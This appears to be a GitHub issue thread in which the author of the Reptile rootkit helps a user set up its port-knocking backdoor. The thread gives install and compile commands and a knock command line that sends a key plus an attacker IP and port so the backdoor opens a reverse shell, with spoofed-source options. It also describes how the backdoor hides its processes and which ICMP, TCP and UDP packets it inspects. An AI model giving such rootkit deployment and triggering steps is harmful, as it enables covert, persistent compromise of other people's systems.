Having trouble in getting the backdoor to work

[evelynEdison]

Hello, I'm not sure if I'm supposed to install the rootkit on both the client and the server, or whether this is something that you catch over netcat.

[f0rb1dd3n]

You have to install the rootkit only on victim machine. On your attacker machine you will only run the client.

I did the shellscript and makefiles to generate the client on the victim to give you a way to attack from the victim to another hosts in the network. But from your main attack machine perspective you only have to compile knock.c just typing:

cd Reptile/sbin
gcc knock.c -o knock
./knock 

You have to chose the protocol, target address, source address (if you want spoof your address), the payload with key+ip+port.

You dont need to use netcat, cause I already have implement the listener, just use -l options at the end. Something like that:

./knock -x icmp -s (spoofed ip) -t (target IP) -d "F0rb1dd3n (attacker IP) (attacker port)" -l

Take a look into the code and change the key on heavens_door.c if you want.

I think it helps you.

F0rb1dd3n

[evelynEdison]

Hello, Should I run ./heavens_door command first on the victim machine?
I run ./heavens_door command on the victim machine and run lsof -i tcp:80, but nothing shows on the screen. I think it should listen on the port 80

[f0rb1dd3n]

No man, Reptile already run heavens_door for you and hide her processes. You just have to run ./installer.sh install and nothing more. Also, heavens_door doesnt listen any port, that is a port knocking backdoor, she just inspect the packets that are being received on the machine, and returns a shell if is a right packet.

Originally I have configured just to inspect packets received via ICMP or TCP on port 80 or UDP on port 53. But that is irrelevant, you can change this. There is not a listen port, but a inspection of packets that are targeting a port.

[evelynEdison]

Hello, I have doubt in the <reverse IP> in the line below:

-d Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"

If my real source ip is 192.168.2.13, should I use -d "F0rb1dd3n 31.2.861.291 4444" in reverse form instead of -d "F0rb1dd3n 192.168.2.13 4444"?

[f0rb1dd3n]

no man, you have to use the normal form -d "F0rb1dd3n 192.168.2.13 4444"

The client will do all the job for you.

[f0rb1dd3n]

@rabbpigPan are you having any another trouble? Can we close this issue?

[evelynEdison]

Yes, I am still having trouble in getting the backdoor to work. After I entered the correct source IP and target IP,

Knock Knock on Heaven's (Back)Door
Written by: F0rb1dd3n

Knock knock Neo...

[+] Knocking with UDP protocol
.........
[+] 59 bytes was sent

it only showed the information above and didn't prompt the reverse shell for a long time.

Does it support the NAT network or only work on the local network?

[f0rb1dd3n]

This backdoor does not support NAT, only local network

[evelynEdison]

Thanks for your reply. You can close the issue now.

[ghost]

这个后门不支持NAT，只支持本地网络

Does not support the public network, only supports the internal network?

[f0rb1dd3n]

Just the internal, unless you have a NAT